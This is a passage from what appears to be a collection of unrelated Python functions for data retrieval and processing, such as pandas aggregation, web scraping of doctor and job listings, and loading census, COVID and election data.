OrderedDict()\n projects = [Path(proj) for proj in glob(str(self.data_path.joinpath(\"*\"))) if Path(proj).is_dir()]\n\n for project in projects:\n files = []\n \n # Read all csv files and save them as a list in files\n for ver in glob(str(project.joinpath(\"*.csv\"))):\n files.extend(pd.read_csv(ver, usecols=['time', 'buggy']).values.tolist())\n \n # Create a pandas dataframe from the csv sorted by datetime\n df = pd.DataFrame(files, columns=['Time', 'Bugs']).sort_values(by='Time').reset_index(drop=True)\n \n # Convert time to Pandas DateTime format\n df['Time'] = pd.to_datetime(df['Time']) \n \n # Group bug counts by week starting on monday\n df = df.reset_index().set_index('Time').groupby(\n [pd.Grouper(freq='W-MON')])[\"Bugs\"].sum().astype(int).reset_index()\n \n df = df.set_index('Time')\n # Save the data to dictionary\n all_data.update(OrderedDict({project.name: df}))\n\n return all_data", "def get_doctor_info(url, html):\n \n # create a dictionary to save data\n doctor_info = {}\n \n # parsed html by using lxml\n # In the following processing\n # the one ending in org is the raw data in the HTML\n # the one ending in inf is the processed data by extracting from raw data\n select = etree.HTML(html)\n \n # part 1: get basic information about your doctor\n # attribute: Name, Title, Hospital, Department\n name_org = select.xpath('//div[@class=\"profile-text\"]//h1[@class=\"doctor-name\"]//text()')\n name_inf = name_org[0].strip()\n \n title_org = select.xpath('//div[@class=\"profile-text\"]//span[@class=\"positon\"]//text()')\n title_inf = [i.strip() for i in title_org if len(i.strip()) > 0]\n title_inf = ' '.join(title_inf)\n \n hospital_department_org = select.xpath('//div[@class=\"profile-text\"]//p[@class=\"doctor-faculty\"]//text()')\n hospital_department_inf = [i.strip() for i in hospital_department_org if len(i.strip()) > 0]\n hospital_inf = hospital_department_inf[0]\n department_inf = hospital_department_inf[1]\n \n doctor_info['姓名'] = name_inf\n doctor_info['职称'] = title_inf\n doctor_info['医院'] = hospital_inf\n doctor_info['科室'] = department_inf\n \n # part2: get header format data\n org = select.xpath('//div[@class=\"profile-sta\"]//text()')\n inf = [i.strip() for i in org if len(i.strip()) > 0 and i.strip() != '%']\n for i in range(len(inf)//2):\n doctor_info[inf[2*i]] = inf[2*i + 1]\n \n \n # part3: get sidebar format data\n org_1 = select.xpath('//div[@class=\"item-body\"]//div[@class=\"clearfix\"]//div[@class=\"per-sta-label\"]//text()')\n org_2 = select.xpath('//div[@class=\"item-body\"]//div[@class=\"clearfix\"]//div[@class=\"per-sta-data\"]//text()')\n for i in range(len(org_1)):\n doctor_info[org_1[i][:-1]] = org_2[i]\n \n # part4: get body format data\n honour_org = select.xpath('//div[@class=\"honour-header\"]//text()')\n honour_inf = ''.join([i.strip() for i in honour_org])\n \n honour_detail_org = select.xpath('//li[@class=\"honour-title\"]//text()')\n honour_detail_inf = [i.strip()[:4] for i in honour_detail_org if len(i.strip()) > 0]\n honour_detail_inf = ' '.join(honour_detail_inf)\n \n satisfaction_org = select.xpath('//div[@class=\"item-body\"]//div[@class=\"satisfaction clearfix\"]//i[@class=\"sta-num\"]//text()')\n satisfaction_inf = [i.strip() for i in satisfaction_org if len(i.strip()) > 0 and i.strip() != '%']\n \n resume_org = select.xpath('//div[@class=\"good-at-text\"]//text()')\n resume_inf = [i.strip() for i in resume_org]\n if len(resume_inf) <= 20:\n resume_inf = ''.join(resume_inf)\n resume_inf = ''.join(resume_inf[:20])\n \n star_org = select.xpath('//div[@class=\"experience-row clearfix\"]//span[@class=\"experience-label\"]//text()')\n star_inf = 1 if len(star_org) >= 1 else 0\n\n doctor_info['好大夫届数'] = honour_inf\n doctor_info['好大夫具体年份'] = honour_detail_inf\n doctor_info['简历'] = resume_inf \n doctor_info['诊后服务星'] = star_inf\n try:\n doctor_info['疗效满意度'] = satisfaction_inf[0]\n doctor_info['态度满意度'] = satisfaction_inf[1]\n except:\n pass\n \n # part5: personal url\n personal_url = url\n doctor_info['医生个人链接'] = personal_url\n \n return doctor_info", "def get_data(self):\n\n # Import json data into a pandas dataframe\n df = pd.read_json(\"./nutrients.json\", lines=True)\n\n return df", "def _gather_deep_data(self):\n\n cleaned_data_from_website = list()\n\n for i, search_result in self.data_from_website.iterrows():\n cleaned_data_from_website.append(self._deep_data(search_result.url))\n\n cleaned_data_from_website = pd.DataFrame(cleaned_data_from_website)\n if len(cleaned_data_from_website) == 0:\n cleaned_data_from_website['@id'] = '0'\n cleaned_data_from_website.set_index('@id', inplace=True)\n self.data_from_website = cleaned_data_from_website", "def get_infos(self):\n infos = dict()\n infos[\"dataset\"] = self.dataset_name\n infos[\"task\"] = \"separate_noisy\"\n infos[\"licenses\"] = [librispeech_license, tac_license]\n return infos", "def _91_render_plant_data_to_projects(records, **params):\n for plant_record in [record for record in records if record[\"Type\"] == \"Plant\"]:\n key = (plant_record[\"Power Plant Name\"], plant_record[\"Project Name\"])\n project_records = [\n record\n for record in records\n if record[\"Type\"] == \"Project\"\n and record[\"Power Plant Name\"] == plant_record[\"Power Plant Name\"]\n ]\n if len(project_records) == 0:\n log.error(\"NO PROJECT RECORDS FOR %s\" % (key,))\n for project_record in project_records:\n for field in plant_record.keys():\n if project_record.get(field) in [None, '']:\n project_record[field] = plant_record[field]\n return records", "def queryFlywheel(project):\n\n # Create info dict with entries for each subject.\n info = dict()\n\n # Loop through subjects in project\n #for sub in subjects:\n for sub in project.subjects():\n\n # Loop through sessions in subject\n for ses in sub.sessions():\n ses = ses.reload()\n\n # Loop through acquisitions in session\n for acq in ses.acquisitions():\n acq = acq.reload()\n\n # Loop through files in acquisition\n for f in acq.files:\n \n # Skip over non-nifti files\n if f.type != 'nifti':\n next\n\n # Get Flywheel fileId to use as unique identifier\n fileId = f.id\n\n # Try to get timestamp (sometimes DateTime field isn't present.) \n try:\n timestamp = f.info['AcquisitionDateTime']\n except KeyError:\n try:\n timestamp = f.info['AcquisitionDate']\n # Set to None if field isn't present\n except:\n timestamp = pd.NaT\n \n # Try to get series number (sometimes field isn't present.) \n try:\n seriesNum = f.info['SeriesNumber']\n # Set to None if field isn't present\n except:\n np.NaN \n # Add the folowing metadata to study info dict:\n # fileID: [subId, sesId, acqLabel, fileName, seriesNum, timestamp]\n info[fileId] = [sub.label, ses.label, acq.label, f.name, seriesNum, timestamp]\n \n # Return project info dict\n return info", "def get_org_projects_info(org_link):\n response = get_response(org_link)\n if response.ok:\n soup = BeautifulSoup(response.text, 'html.parser')\n projects_li = soup.find_all(\n 'li', attrs={'layout': True}\n )\n project_info = []\n for proj_html in projects_li:\n proj_info = {}\n proj_title = proj_html.get('aria-label').replace('\\n', '')\n proj_desc = proj_html.find(\n 'div', attrs={'class': 'archive-project-card__content'}).text.replace('\\t', '')\n proj_relative_link = proj_html.select('a')[0].get('href')\n proj_full_link = HOME_PAGE + proj_relative_link\n proj_info['title'] = proj_title\n proj_info['description'] = proj_desc\n proj_info['link'] = proj_full_link\n project_info.append(proj_info)\n return project_info", "def extract_data(self, root, path, tag):\n data = []\n element = root.xpath(path)\n if element:\n url = self.PODEROPEDIA_BASE_URL + element[0].get('data-w2p_remote', None)\n if url:\n self.logger.debug('Querying {} from {}'.format(tag, url))\n try:\n response = self.session.get(url)\n response.raise_for_status()\n content = response.content\n html_tree = etree.HTML(content, parser=self.parser)\n if html_tree is None:\n return data\n rows = html_tree.xpath('.//*[starts-with(@id, \"collapse\")]/div/table/tr')\n for row in rows:\n target = target_name = target_path = relationship = None\n when = where = where_name = where_path = source = None\n row_id = row.get('id', '')\n cells = row.getchildren()\n idx = 0\n while idx < len(cells) - 1:\n try:\n cell_text = text_strip(cells[idx])\n except AttributeError:\n cell_text = ''\n sources = cells[idx].xpath('.//*[@class=\"fuente\"]')\n if len(sources) > 0:\n source = process_sources(cells[idx])\n elif cell_text == 'es' or cell_text == 'fue':\n when = cell_text\n idx = idx - 1\n target = cells[idx].find('a')\n if target is not None:\n target_path = target.get('href', None)\n target_name = text_strip(target)\n idx = idx + 2\n relationship = text_strip(cells[idx])\n elif cell_text == 'a' or cell_text == 'de':\n idx = idx - 1\n relationship = text_strip(cells[idx])\n idx = idx + 2\n target = cells[idx].find('a')\n if target is not None:\n target_path = target.get('href', None)\n target_name = text_strip(target)\n elif cell_text.startswith('desde'):\n when = cell_text\n elif 'es pasado' in cell_text:\n when = cell_text\n else:\n try:\n ignore = int(cell_text)\n when = cell_text\n except ValueError:\n potential_date = cell_text.split(' ')[0]\n try:\n ignore = datetime.strptime(potential_date, '%d-%m-%Y')\n when = cell_text\n except ValueError:\n try:\n ignore = datetime.strptime(potential_date, '%m-%Y')\n when = cell_text\n except ValueError:\n pass\n idx = idx + 1\n entry = {\n 'type': tag,\n 'target_path': target_path,\n 'relationship': relationship,\n 'when': when,\n 'where': where,\n 'source': source\n }\n data.append(entry)\n self.logger.debug('{}: {}'.format(tag, entry))\n except (requests.exceptions.HTTPError, etree.ParserError):\n self.logger.info('Something bad happened', exc_info=True)\n return data", "def getMonthlyPRinfo(df):\n\n new_df = df.filter(['Merged_YM', 'node.title', 'node.url'], axis=1)\n new_df.groupby('Merged_YM')\n new_df.to_csv('PR_Info_Monthly.csv', index=False)", "def fetch_game_info(df: pd.DataFrame) -> pd.DataFrame:\n data_dict = defaultdict(list)\n len = df.shape[0]\n\n with alive_bar(len) as bar:\n for _, row in df.iterrows():\n gid = row['id']\n\n html = fetch_url(TWITCH_TRCK_URL + 'games/' + gid, hint='game')\n divs = html.find_all('div', {'class': 'g-x-s-block'})\n for div in divs:\n # Give a initial value as None\n # so that the program won't raise exception for length\n val, label = (None, None)\n val = div.find('div', {'class': 'g-x-s-value'}).text.strip()\n label = div.find('div', {'class': 'g-x-s-label'}).text.strip()\n if ('@' in label):\n (label, date) = label.split('@')\n label = label.strip()\n val += date\n data_dict[label].append(val)\n\n bar()\n\n df = df.assign(**data_dict)\n return df", "def set_data(self):\n data = [\n {\"ASN1P-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"ASN1P\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }},\n {\"asn1rt-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"asn1rt\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }},\n {\"cadessignature-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"cadessignature\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }},\n { \"JCP-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"JCP\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }},\n { \"JCPRequest-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"JCPRequest\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }}\n ]\n return data", "def print_info(self):\n\n n_metabolites = len(self.metabolites)\n n_reactions = len(self.reactions)\n n_constraints = len(self.constraints)\n n_variables = len(self.variables)\n\n info = pd.DataFrame(columns=['value'])\n info.loc['name'] = self.name\n info.loc['description'] = self.description\n info.loc['num constraints'] = n_constraints\n info.loc['num variables'] = n_variables\n info.loc['num metabolites'] = n_metabolites\n info.loc['num reactions'] = n_reactions\n info.index.name = 'key'\n\n print(info)", "def attach_data(df: pd.DataFrame) -> pd.DataFrame:\n # load in parties and constituents data\n # if data is missing ask if scraping is wanted to be performed\n\n with open(os.path.join(instancepath, f\"parties.json\"), \"r\", encoding='utf-8') as json_file:\n parties = json.load(json_file)\n with open(os.path.join(instancepath, f\"constituencies.json\"), \"r\", encoding='utf-8') as json_file:\n constituencies = json.load(json_file)\n \n\n \"\"\" #tätä glob hommaa en saanu toimiin, käy for loopin sisäl vaan yhen kerran ja hakee vaan yhden tiedoston\n # load the scraped data to its own data frame\n df_scraped = pd.DataFrame(columns=['first_name', 'last_name', 'election_number', 'image', 'election_promise_1', 'party', 'constituency'])\n i = 1\n with suppress(KeyError,FileNotFoundError):\n for filename in glob(f\"{instancepath}/candidate*.json\"):\n print(\"jee\")\n with open(filename, \"r\", encoding='utf-8') as json_file:\n candidate = json.load(json_file)\n party_name = None\n constituency_name = None\n for part in parties:\n if part['id'] == candidate[\"party_id\"]:\n party_name = part['name_fi']\n\n for consti in constituencies:\n if consti['id'] == candidate[\"constituency_id\"]:\n constituency_name = consti['name_fi']\n\n df_scraped = df_scraped.append({'first_name': candidate['first_name'], \n 'last_name': candidate['last_name'], \n 'election_number': candidate['election_number'], \n 'image': candidate['image'], \n 'election_promise_1': candidate['info']['election_promise_1'],\n 'party': party_name,\n 'constituency': constituency_name}, \n ignore_index = True)\n #except (FileNotFoundError, KeyError):\n \"\"\"\n\n # load the scraped data to its own data frame\n df_scraped = pd.DataFrame(columns=['first_name', 'last_name', 'election_number', 'image', 'election_promise_1', 'party', 'constituency'])\n i = 1\n while i <= 3000: # files are named arfter candidate ids and ids range is between 1 and 3000\n with suppress(KeyError,FileNotFoundError):\n with open(os.path.join(instancepath, f\"candidate\" + str(i) + \".json\"), \"r\", encoding='utf-8') as json_file:\n candidate = json.load(json_file)\n party_name = None\n constituency_name = None\n for part in parties:\n if part['id'] == candidate[\"party_id\"]:\n party_name = part['name_fi']\n\n for consti in constituencies:\n if consti['id'] == candidate[\"constituency_id\"]:\n constituency_name = consti['name_fi']\n\n df_scraped = df_scraped.append({\n 'first_name': candidate['first_name'].strip(), \n 'last_name': candidate['last_name'].strip(), \n 'election_number': candidate['election_number'], \n 'image': candidate['image'], \n 'election_promise_1': candidate['info']['election_promise_1'],\n 'party': party_name.strip(),\n 'constituency': constituency_name}, \n ignore_index = True)\n i += 1\n\n\n # loading in data of each individual constituent\n # the ids range from 1 to 14\n j = 1\n constituentArray = []\n constituentArray.append(\"\")\n while j <= 14:\n try:\n with open(os.path.join(instancepath, f'constituent' + str(j) + '.json'), \"r\", encoding='utf-8') as json_file:\n constituentArray.append(json.load(json_file))\n except FileNotFoundError:\n constituentArray.append(\"\")\n j += 1\n\n for i, row in df.iterrows():\n promise = row['Mitkä ovat kolme vaalilupaustasi? Vaalilupaus 1:']\n constituency = row['constituency']\n party = row['party']\n df = search_andsetvalues(promise, constituency, party, df, i, df_scraped)\n return df", "def _fetch_poverty_data(year=None):\n global _SIMPLECOUNT_COLUMNS\n\n try:\n if year is None:\n year = _get_max_year([30, 31]) + 1\n ext = 'txt' if year > 2003 else 'dat'\n url = f'https://www2.census.gov/programs-surveys/saipe/datasets/{year}/{year}-state-and-county/est{str(year)[2:]}-il.{ext}'\n\n raw = pd.read_table(url, header=None, skiprows=1, names=['raw'])\n pattern = '.{3}(?P<fips>.{3}).(?P<all>.{8}).{34}(?P<minor>.{8}).*'\n \n filtered = raw['raw'].str.extract(pattern)\n filtered['year'] = year\n filtered['fips'] = filtered['fips'].astype(int) + 1 / 2\n filtered.columns = ['fk_simplecount_county', '1200', '1201', 'year']\n\n pivoted = pd.melt(\n filtered.astype(int),\n id_vars = ['fk_simplecount_county', 'year'],\n value_vars=['1200', '1201'],\n var_name = 'fk_simplecount_indicator'\n )\n\n return pivoted[_SIMPLECOUNT_COLUMNS]\n except HTTPError as e:\n if e.code == 404:\n raise ValueError(\"WARNING: Poverty data is up to date.\")\n except:\n raise", "def getexperimentinfo(expid):\n rdata = {}\n rdata['expId'] = expid\n res = requests.get(scbd_server_address + '/experiments/get_details', json=rdata)\n if res.status_code == 200:\n outstr = ''\n for cres in res.json()['details']:\n outstr += cres[0] + ':' + cres[1] + '<br>'\n # details=res.json()['details']\n return outstr\n return []", "def filter_page_data(self, document_data: dict) -> dict:\n name = (\n document_data[\"project\"][\"name\"]\n )\n short_description = (\n document_data[\"project\"][\"shortDescription\"]\n )\n created = (\n document_data[\"project\"][\"created\"]\n )\n # due_date = (\n # document_data[\"project\"][\"dueDate\"]\n # )\n changeset_comment = (\n document_data[\"project\"][\"changesetComment\"]\n )\n instructions = (\n document_data[\"project\"][\"externalSource\"][\"instructions\"]\n )\n per_task_instructions = (\n document_data[\"project\"][\"externalSource\"][\"perTaskInstructions\"]\n )\n imagery = (\n document_data[\"project\"][\"externalSource\"][\"imagery\"]\n )\n license = (\n document_data[\"project\"][\"externalSource\"][\"license\"]\n )\n url = (\n document_data[\"project\"][\"url\"]\n )\n # metrics = (\n # document_data[\"platform\"][\"metrics\"]\n # )\n # quality_assurance = (\n # document_data[\"platform\"][\"qualityAssurance\"]\n # )\n users = (\n document_data[\"project\"][\"users\"]\n )\n project_page_data = {\n \"project\": {\n \"name\": name,\n \"shortDescription\": short_description,\n \"created\": created,\n # \"due_date\": due_date,\n \"changesetComment\": changeset_comment,\n \"externalSource\": {\n \"instructions\": instructions,\n \"perTaskInstructions\": per_task_instructions,\n \"imagery\": imagery,\n \"license\": license\n },\n \"url\": url,\n \"users\": users\n }\n # \"metrics\": metrics,\n # \"quality_assurance\": quality_assurance,\n }\n return project_page_data", "def extract_data():\n client = MongoClient(HOST, PORT)\n collection = client[DB][COLLECTION]\n df = pd.DataFrame(collection.find().limit(10))\n return df", "def subjectinfo(subject_id):\n import pandas as pd\n from nipype.interfaces.base import Bunch\n \n def construct_sj(trialinfo, subject_id, run_num, cond_name):\n \"\"\"construct df\"\"\"\n df_sj = trialinfo[(trialinfo['subject']==int(subject_id)) & (trialinfo['session']==int(run_num))]\n sj_info = pd.DataFrame()\n sj_info['onset'] = df_sj['runtime']\n sj_info['duration'] = 0.\n sj_info['weight'] = 1.\n trial_type = df_sj['seq'].replace({1:'Low', 2:'High'})\n sj_info['trial_type'] = trial_type\n sj_info_cond = sj_info[sj_info['trial_type']==cond_name]\n return sj_info_cond\n\n def select_confounds(subject_id, run_num):\n \"\"\"import confounds tsv files\"\"\"\n confounds_dir = f'/data/sub-%02d/func/' % int(subject_id)\n confounds_file = confounds_dir+f'sub-%02d_task-tsl_run-%d_desc-confounds_timeseries.tsv' % (int(subject_id), int(run_num))\n conf_df = pd.read_csv(confounds_file, sep='\\t')\n return conf_df\n\n def confounds_regressor(conf_df, conf_names):\n \"\"\"select confounds for regressors\"\"\"\n conf_select = conf_df[conf_names].loc[4:].fillna(0) # ignore first 4 dummy scans\n conf_select_list = [conf_select[col].values.tolist() for col in conf_select] \n return conf_select_list\n\n def find_runs(subject_id):\n \"\"\"find available runs from func\"\"\"\n from glob import glob\n func_dir = f'/output/smooth_nomask/preproc/sub-%02d/' % int(subject_id) \n func_files = glob(func_dir+'*bold.nii')\n runs = []\n for f in func_files:\n tmp = f.split('/')\n run = tmp[5].split('_')[2].split('-')[1]\n runs.append(int(run))\n return sorted(runs)\n \n conf_names = ['csf','white_matter','global_signal',\n 'dvars','std_dvars','framewise_displacement', 'rmsd',\n 'a_comp_cor_00', 'a_comp_cor_01', 'a_comp_cor_02', 'a_comp_cor_03', 'a_comp_cor_04', 'a_comp_cor_05', 'cosine00', 'cosine01', 'cosine02', 'cosine03', 'cosine04', 'cosine05',\n 'trans_x', 'trans_y', 'trans_z', 'rot_x','rot_y','rot_z']\n\n alltrialinfo = pd.read_csv('/code/data/fmri_behavioural_new.csv')\n alltrialinfo.head()\n \n subject_info = []\n onset_list = []\n condition_names = ['High', 'Low']\n runs = find_runs(subject_id)\n print(runs)\n for run in runs:\n for cond in condition_names:\n run_cond = construct_sj(alltrialinfo, subject_id, run, cond)\n onset_run_cond = run_cond['onset'].values\n onset_list.append(sorted(onset_run_cond))\n\n subject_info = []\n for r in range(len(runs)):\n onsets = [onset_list[r*2], onset_list[r*2+1]]\n regressors_all = select_confounds(subject_id, runs[r])\n regressors = confounds_regressor(regressors_all, conf_names)\n\n subject_info.insert(r,\n Bunch(conditions=condition_names,\n onsets=onsets,\n durations=[[0], [0]],\n regressors=regressors,\n regressor_names=conf_names,\n amplitudes=None,\n tmod=None,\n pmod=None))\n\n return subject_info # this output will later be returned to infosource", "def getStudyInfo(self, study_id, web_app_user_id):\n con = self.getMetadataDatabaseConnection()\n results = con.cursor()\n con.cursor().callproc('qiime_assets.get_study_info', [study_id, web_app_user_id, results])\n study_info = {}\n for row in results:\n study_info['submit_to_insdc'] = row[0]\n study_info['investigation_type'] = row[1]\n study_info['project_name'] = row[2]\n study_info['experimental_factor'] = row[3]\n study_info['study_alias'] = row[4]\n study_info['study_title'] = row[5]\n study_info['study_type'] = row[6]\n study_info['study_abstract'] = row[7]\n study_info['study_description'] = row[8]\n study_info['center_name'] = row[9]\n study_info['center_project_name'] = row[10]\n study_info['project_id'] = row[11]\n study_info['pmid'] = row[12]\n study_info['metadata_complete'] = row[13]\n study_info['sff_complete'] = row[14]\n study_info['mapping_file_complete'] = row[15]\n study_info['miens_compliant'] = row[16]\n study_info['can_delete'] = row[17]\n study_info['avg_emp_score'] = row[18]\n study_info['user_emp_score'] = row[19]\n study_info['number_samples_promised'] = row[20]\n study_info['number_samples_collected'] = row[21]\n study_info['principal_investigator'] = row[22]\n study_info['sample_count'] = row[23] \n study_info['lab_person'] = row[24] \n study_info['lab_person_contact'] = row[25]\n study_info['emp_person'] = row[26]\n study_info['first_contact'] = row[27]\n study_info['most_recent_contact'] = row[28]\n study_info['sample_type'] = row[29]\n study_info['has_physical_specimen'] = row[30]\n study_info['has_extracted_data'] = row[31]\n study_info['timeseries'] = row[32]\n study_info['spatial_series'] = row[33]\n study_info['principal_investigator'] = row[34]\n study_info['principal_investigator_contact'] = row[35]\n study_info['default_emp_status'] = row[36]\n study_info['funding'] = row[37]\n study_info['includes_timeseries'] = row[38]\n study_info['sample_count'] = row[39]\n study_info['ebi_study_accession'] = row[40]\n study_info['locked'] = row[41]\n study_info['vamps_id'] = row[42]\n return study_info", "def get_projects(session):\n cursuses = [1, 21] # cursus ids from which to get the projects\n project_names = []\n\n for cursus in cursuses:\n # Get all the projects from 1 cursus, very slow process because projects endpoint contains\n # a lot of information\n projects = get_all_pages(session, f'/cursus/{cursus}/projects', 100, {'filter[exam]': False})\n for project in projects:\n # Create dictionary containing project id and project name ans set in bigger dict\n project_names.append({'id': project['id'], 'name': project['name']})\n\n return project_names", "def download_potholes():\n\n\tlink = \"https://data.cityofchicago.org/api/views/7as2-ds3y/rows.csv?accessType=DOWNLOAD\"\n\tdf = pd.read_csv(link)\n\tdf = df[(df.STATUS == \"Open\") | (df.STATUS == \"Open - Dup\")]\n\tdf = df[[\"LATITUDE\", \"LONGITUDE\"]]\n\tdf = df.dropna(axis =0, subset=[\"LATITUDE\", \"LONGITUDE\"])\n\treturn df", "def _build_single_study_info(study, info, study_proc, proc_samples):\n PI = StudyPerson(info['principal_investigator_id'])\n status = study.status\n if info['publication_doi'] is not None:\n pmids = get_pubmed_ids_from_dois(info['publication_doi']).values()\n info['pmid'] = \", \".join([pubmed_linkifier([p]) for p in pmids])\n info['publication_doi'] = \", \".join([doi_linkifier([p])\n for p in info['publication_doi']])\n\n else:\n info['publication_doi'] = \"\"\n info['pmid'] = \"\"\n if info[\"number_samples_collected\"] is None:\n info[\"number_samples_collected\"] = 0\n info[\"shared\"] = _get_shared_links_for_study(study)\n # raw data is any artifact that is not Demultiplexed or BIOM\n\n info[\"num_raw_data\"] = len([a for a in study.artifacts()\n if a.artifact_type not in ['Demultiplexed',\n 'BIOM']])\n info[\"status\"] = status\n info[\"study_id\"] = study.id\n info[\"pi\"] = study_person_linkifier((PI.email, PI.name))\n del info[\"principal_investigator_id\"]\n del info[\"email\"]\n # Build the proc data info list for the child row in datatable\n info[\"proc_data_info\"] = []\n for data_type, proc_datas in viewitems(study_proc[study.id]):\n info[\"proc_data_info\"].extend([\n _build_single_proc_data_info(pd_id, data_type, proc_samples[pd_id])\n for pd_id in proc_datas])\n return info", "def example_data():\n return {\n # \"$schema\": \"\",\n \"id\": \"12345-abcde\",\n \"metadata\": {\n \"title\": \"My record\",\n \"date\": \"2020-09-20\",\n },\n \"pids\": {\n \"oaiid\": {\"value\": \"\", \"provider\": \"local\"},\n },\n }", "def get_data_dict(self):\n\n print('---------repo creation date------------------')\n print('start date', self.start_date)\n print('---------------------------------------------')\n print('------Commits----------')\n print(self.commits)\n print('--------------------------------------------')\n\n df = pd.DataFrame.from_records(self.commits) # pylint: disable=invalid-name\n df.date = pd.to_datetime(df.date, utc=True, unit='s')\n df.set_index('date', inplace=True)\n df.index = df.index.floor('D')\n\n date_range = pd.date_range(start=self.start_date, end=self.end_date, freq=self.date_unit)\n date_range = date_range.floor('D')\n\n grouped = df.groupby('author')\n new_df = pd.DataFrame(index=date_range)\n for name, group in grouped:\n new_df[name] = group.groupby('date').size()\n new_df.fillna(0, inplace=True)\n\n return {\n 'x': new_df.index.strftime('%Y-%m-%d').tolist(),\n 'y': new_df.columns.tolist(),\n 'z': new_df.T.values.astype('int32').tolist()\n }", "def make_df_from_json(json_files, out_file):\n table = [[\"name\", \n \"cik\", \n \"city\",\n \"state\",\n \"street1\",\n \"street2\",\n \"zip_code\",\n \"year_of_incorp\", \n \"min_inv\", \n \"tot_off\", \n \"tot_sold\", \n \"tot_rem\", \n \"ind_group_type\", \n \"has_non_accred\", \n \"num_non_accred\", \n \"tot_num_inv\"\n ]] \n\n for json_dict in json_files:\n\n with open(json_dict, \"rb\") as f:\n data = json.load(f)\n print(json_dict)\n\n for i, key in enumerate(data):\n # if i % 1000 == 0:\n # print(i)\n entry = data[key] \n if entry == {}:\n #print(\"missing entry {0}\".format(i))\n continue\n row = []\n\n primary_issuer = entry[\"Primary Issuer\"]\n cik = primary_issuer[\"cik\"]\n name = primary_issuer[\"entity_name\"]\n phone = primary_issuer[\"phone\"]\n year_of_incorp = primary_issuer[\"year_of_incorp\"]\n address = primary_issuer[\"address\"]\n city = address[\"city\"]\n state = address[\"state\"]\n street1 = address[\"street1\"]\n street2 = address[\"street2\"]\n zip_code = address[\"zip_code\"]\n\n secondary_issuers = entry[\"Secondary Issuers\"]\n related_people = entry[\"Related People\"]\n \n offering_data = entry[\"Offering Data\"]\n min_inv = offering_data[\"min_investment_accepted\"]\n tot_off = offering_data[\"total_offering_amount\"]\n tot_sold = offering_data[\"total_amount_sold\"]\n tot_rem = offering_data[\"total_remaining\"]\n ind_group_type = offering_data[\"ind_group_type\"]\n has_non_accred = offering_data[\"has_non_accred\"]\n num_non_accred = offering_data[\"num_non_accred\"]\n tot_num_inv = offering_data[\"tot_num_inv\"] \n\n row = [name, \n cik, \n city,\n state,\n street1,\n street2,\n zip_code,\n year_of_incorp,\n min_inv,\n tot_off,\n tot_sold,\n tot_rem,\n ind_group_type,\n has_non_accred,\n num_non_accred,\n tot_num_inv\n ]\n\n table.append(row)\n\n df = pd.DataFrame(table)\n df.to_csv(out_file)\n\n return 0", "def search_andsetvalues(promise, constituency, party, df: pd.DataFrame, i, df_scraped) -> pd.DataFrame:\n candidates = df_scraped.loc[(df_scraped['constituency'] == constituency) & (df_scraped['party'] == party)] #& \n\n for j, row in candidates.iterrows():\n if compare_promises(row[\"election_promise_1\"][\"fi\"], row[\"election_promise_1\"][\"se\"], \n row[\"election_promise_1\"][\"en\"], promise):\n df.at[i,'name'] = row[\"first_name\"] + \" \" + row[\"last_name\"]\n df.at[i, 'number'] = str(row[\"election_number\"]) \n df.at[i,'image'] = \"https://ehdokaskone.yle.webscale.fi/\" + row['image']\n return df", "def download(self, verbose):\n # Download datasets\n if verbose:\n print(\"Retrieving datasets from Our World In Data https://github.com/owid/covid-19-data/\")\n # Vaccinations\n v_rec_cols = [\n \"date\", \"location\", \"iso_code\", \"total_vaccinations\", \"people_vaccinated\", \"people_fully_vaccinated\"]\n v_rec_df = pd.read_csv(self.URL_V_REC, usecols=v_rec_cols)\n v_loc_df = pd.read_csv(self.URL_V_LOC, usecols=[\"location\", \"vaccines\"])\n v_df = v_rec_df.merge(v_loc_df, how=\"left\", on=\"location\")\n # Tests\n pcr_rec_cols = [\"ISO code\", \"Date\", \"Daily change in cumulative total\", \"Cumulative total\"]\n pcr_df = pd.read_csv(self.URL_P_REC, usecols=pcr_rec_cols)\n pcr_df = pcr_df.rename(columns={\"ISO code\": \"iso_code\", \"Date\": \"date\"})\n pcr_df[\"cumsum\"] = pcr_df.groupby(\"iso_code\")[\"Daily change in cumulative total\"].cumsum()\n pcr_df = pcr_df.assign(tests=lambda x: x[\"Cumulative total\"].fillna(x[\"cumsum\"]))\n # Combine data (vaccinations/tests)\n df = v_df.set_index([\"iso_code\", \"date\"])\n df = df.combine_first(pcr_df.set_index([\"iso_code\", \"date\"]).loc[:, [\"tests\"]])\n df = df.reset_index()\n # Location (country/province)\n df[\"location\"] = df[\"location\"].replace(\n {\n # COG\n \"Congo\": \"Republic of the Congo\",\n }\n )\n df = df.loc[~df[\"iso_code\"].str.contains(\"OWID_\")]\n df[\"location\"] = df.groupby(\"iso_code\")[\"location\"].bfill()\n df.loc[df[\"location\"] == df[\"iso_code\"], \"location\"] = None\n df.loc[df[\"location\"].isna(), \"location\"] = df.loc[df[\"location\"].isna(), \"iso_code\"].apply(\n lambda x: coco.convert(x, to=\"name_short\", not_found=None))\n df[self.PROVINCE] = self.UNKNOWN\n return df", "def _request_info(self):\n \n current_date = str(datetime.datetime.now(pytz.timezone('US/Mountain')))\n json_dct = {'search_title': self.job_title, \\\n 'search_location': self.job_location, \\\n 'search_date': current_date, 'job_site': 'indeed'}\n # Holds the actual CSS selector as the key and the label I want to store\n # the info. as as the key. \n possible_attributes = {'.jobtitle': \"job_title\", '.company': \"company\", \\\n '.location': \"location\", '.date': \"date\", \\\n '.iaLabel': \"easy_apply\"}\n for k, v in possible_attributes.iteritems(): \n res = self.row.select(k)\n if res: \n json_dct[v] = res[0].text\n # Now let's grab the href and pass that on to another function to \n # get that info. \n href = self.row.find('a').get('href')\n json_dct['href'] = href\n json_dct['posting_txt'] = self._query_href(href)\n\n return json_dct", "def viewdata(data):\n\n print('_' * 50)\n print('Number of Results: ' + str(data[0]['numResults']))\n print('\\nSearchURL: ' + data[0]['searchURL'])\n print('_' * 50)\n\n i = 